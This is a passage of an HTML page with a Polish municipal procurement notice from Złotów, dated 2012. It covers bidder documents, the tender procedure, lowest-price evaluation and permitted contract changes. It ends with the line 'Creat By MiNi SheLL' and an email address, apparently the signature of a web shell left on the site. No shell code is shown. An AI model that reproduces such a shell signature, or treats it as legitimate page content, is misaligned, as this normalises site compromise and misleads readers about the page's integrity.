<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">a) wykaz przyjętych do oferty maszyn, urządzeń i wyposażenia. , 
b) potwierdzenie przyjęcia wymagań dla zastosowanego wyposażenia i materiałów.</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Formularz ofertowy
2. Tabela cenowa
3. Wstępny harmonogram rzeczowo - finansowy
4. Pełnomocnictwo
5. Dowód wniesienia wadium</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zgodnie z treścią art. 144 ust.1 ustawy Prawo zamówień publicznych Zamawiający przewiduje możliwość dokonania zmian w umowie zawartej z Wykonawcą.
2. Zmiany w umowie, na skutek wystąpienia poniższych okoliczności mogą dotyczyć następujących elementów umowy:
a) termin wykonania zamówienia :
wystąpienie różnego rodzaju klęsk żywiołowych, epidemii, operacji wojennych, strajku generalnego, mających bezpośredni wpływ na terminowość wykonywania robót,
zmiany kolejności wykonania części zamówienia bądź rezygnacji z wykonania części zamówienia,
wystąpienia nietypowych, dla danego okresu, warunków atmosferycznych uniemożliwiających wykonywanie robót - fakt ten musi zostać zgłoszony zamawiającemu i musi zostać potwierdzony przez inspektora nadzoru, 
ustalenie innych warunków płatności,
wystąpienie odmiennych od przyjętych w dokumentacji projektowej warunków geotechnicznych i wysokiego poziomu wód gruntowych,
wystąpienie odmiennych od przyjętych w dokumentacji projektowej warunków terenowych, w szczególności istnienia nie zinwentaryzowanych podziemnych sieci, instalacji, urządzeń, obiektów budowlanych, pozostałości itp.,
konieczność wykonania zamówień dodatkowych, niezbędnych do wykonania zamówienia podstawowego,
nie wywiązywanie się z uzgodnionych terminów przez innych wykonawców lub usługodawców, działających na zlecenie Zamawiającego, a mające wpływ na zakończenie i odbiór końcowy zadania (w tym opinie, decyzje, odbiory techniczne, itp.).
b) terminy płatności:
nieprzewidziany brak płynności finansowej u Zamawiającego,
zmiany w obowiązujących przepisach, jeżeli zgodnie z nimi konieczne będzie dostosowanie treści umowy do aktualnego stanu prawnego,
przedmiot zamówienia:
aktualizacja rozwiązań ze względu na postęp technologiczny oraz błędy projektowe niemożliwe do przewidzenia na etapie składania ofert.
konieczność wykonania robót zamiennych ,
rezygnacja z wykonania niektórych robót,
zaniechanie wykonywania niektórych robót,
d)         wynagrodzenie umowne:
zmiany w obowiązujących przepisach, jeżeli zgodnie z nimi konieczne będzie dostosowanie treści umowy do aktualnego stanu prawnego, w tym urzędowa zmiana stawki podatku VAT obowiązującej na dzień podpisania umowy, 
rezygnacja  lub zaniechanie wykonania niektórych elementów robót, 
wykonanie robót zamiennych o niższej wartości jak oferowane,
e)         innych postanowień umowy:
zmiany w obowiązujących przepisach, jeżeli zgodnie z nimi konieczne będzie dostosowanie treści umowy do aktualnego stanu prawnego,
zmiany kluczowego personelu ze strony Zamawiającego i Wykonawcy,
zmiany harmonogramu rzeczowo - finansowego.

3. Wszystkie powyższe postanowienia stanowią katalog zmian, na które Zamawiający może wyrazić zgodę. Nie stanowią jednocześnie zobowiązania do wyrażenia takiej zgody.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.zlotow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski Złotów, al. Piasta 1,
77-400 Złotów.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.10.2012 godzina 11:00, miejsce: Urząd Miejski w Złotowie, al. Piasta 1, 77-400 Złotów - pok. Nr 13 (sekretariat).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com